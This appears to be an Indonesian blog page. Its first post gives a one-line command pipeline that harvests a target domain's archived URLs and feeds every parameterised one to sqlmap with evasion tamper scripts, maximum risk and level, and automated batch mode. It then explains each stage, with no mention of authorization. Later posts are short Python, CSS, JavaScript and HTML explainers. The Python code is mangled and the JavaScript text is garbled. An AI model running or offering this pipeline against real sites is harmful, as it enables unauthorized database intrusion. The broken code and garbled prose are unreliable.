Wednesday, 13 November 2024

Cara mudah mencari kerentanan sql injection

      Comment   
Berikut adalah cara paling mudah untuk mencari kerentanan sql injection pada sebuah website hanya dengan 1 perintah.



1 Baris perintah untuk mencari kerentanan SQLI :


waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'


atau


waybackurls target.com | grep '=' | httpx --silent --status-code | awk '{print $1}' | xargs -I{} sqlmap -u {} --random-agent --tamper=space2comment --level 5 --risk 3 --batch --threads 5



1. waybackurls target.com


Deskripsi: Alat waybackurls digunakan untuk mengambil arsip URL dari Wayback Machine atau penyimpanan arsip lainnya untuk domain target.com.

    

Fungsi: Ini memberikan daftar URL yang sebelumnya diketahui untuk domain tersebut, yang bisa mencakup titik masuk potensial bagi serangan.


2. grep '='


Deskripsi: grep '=' digunakan untuk memfilter URL yang mengandung tanda =.

   

Fungsi: URL yang mengandung = biasanya menunjukkan adanya parameter dalam URL, yang mungkin rentan terhadap serangan SQL Injection atau eksploitasi parameter lainnya.


3. httpx --silent --status-code


Deskripsi: httpx adalah alat yang mengirimkan permintaan HTTP ke URL yang difilter dari output waybackurls dan menambahkan status code HTTP pada setiap baris URL hasilnya.

    

Fungsi: Ini memeriksa apakah URL masih aktif (contohnya, hanya mengambil URL yang memiliki kode status valid seperti 200).


4. awk '{print $1}'


Deskripsi: awk digunakan untuk menampilkan hanya URL, tanpa status code.

    

Fungsi: Karena httpx menambahkan status code pada output, awk '{print $1}' memisahkan URL tersebut agar mudah digunakan dalam tahap selanjutnya.


5. xargs -I{} sqlmap -u {} ...


Deskripsi: xargs menjalankan perintah sqlmap untuk setiap URL yang difilter, menggantikan {} dengan URL dari hasil awk.

    

Fungsi: xargs memungkinkan penggunaan dinamis dari URL sebagai input untuk sqlmap.


6. sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'

Tuesday, 27 August 2024

Script Python sederhana untuk menyimpan nilai ke dalam file

      Comment   
Python, sebuah bahasa pemrograman yang populer dan fleksibel, telah mengubah dunia teknologi dengan cara yang luar biasa. Dengan sintaksis yang mudah dibaca dan berbagai perpustakaan standar, Python menjadi pilihan utama bagi programmer untuk mengembangkan aplikasi web, data science, AI, dan lain-lain.



Berikut ini adalah contoh script Python sederhana untuk menyimpan nilai ke dalam file:


python

Contoh script :

# Buat file baru jika tidak ada
if not os.path.exists('data.txt'):  # Check if file exists 
    with open('data.txt', 'w') as f:  # Create new file if not exist 
        pass   # Do nothing here    
# Tentukan nilai untuk ditulis ke dalam file  
value = input("Enter a value to be saved: ")   # Get user input   
# Simpan nilai ke dalam file    
with open('data.txt', 'a') as f:   # Open the existing or new file for writing    f.write(f"{value}\n") # Write the value to the end of the text in a new line      f.close()   # Close the opened files     print("Value saved successfully!")       ```

Apa itu CSS ?

      Comment   
CSS (Cascading Style Sheets) adalah bahasa yang digunakan untuk mendeskripsikan penampilan dokumen yang ditulis dengan HTML. Ini memungkinkan Anda untuk menentukan cara penggunaan elemen di halaman web, seperti teks, gambar dan tabel, harus terlihat. Dengan CSS, Anda dapat mengubah warna, ukuran huruf dan gaya font, jarak antara elemen dan lainnya lagi.



Contoh:

css

/* Set all paragraphs to have an orange background */
p { 
  background-color: orange; 
}  

Apa itu Java Script ?

      Comment   
JavaScript adalah bahasa pemrograman skrip yang populer dan dinamis. Dibuat oleh Brendan Eich, JavaScript pertama kali dirilis pada tahun 1995 sebagai bagian integral dariperambilan World Wide Web (WW).



JavaScript digunakan untukmembuat web page interaktif, menyakaniinya untukmenyapembuatan event handling dan memngganti data transfer antarasional data antarasional data.

Apa itu HTML ?

      1 comment   
HTML (Hypertext Markup Language) adalah bahasa markup yang digunakan untuk membuat halaman web. Bahasa ini memungkinkan pengguna untuk menyusun teks, gambar, video, dan lainnya dalam sebuah halaman web yang dapat diakses melalui peramban web.



HTML menggunakan tag untuk menentukan struktur dan konten dari halaman web. Tag-tag ini diberikan nama sesuai dengan tugas mereka dalam membentuk halaman tersebut. Contohnya adalah tag <html> yang menandai awal dokumen HTML dan tag <body> yang menandai bagian utama dari dokumen tersebut.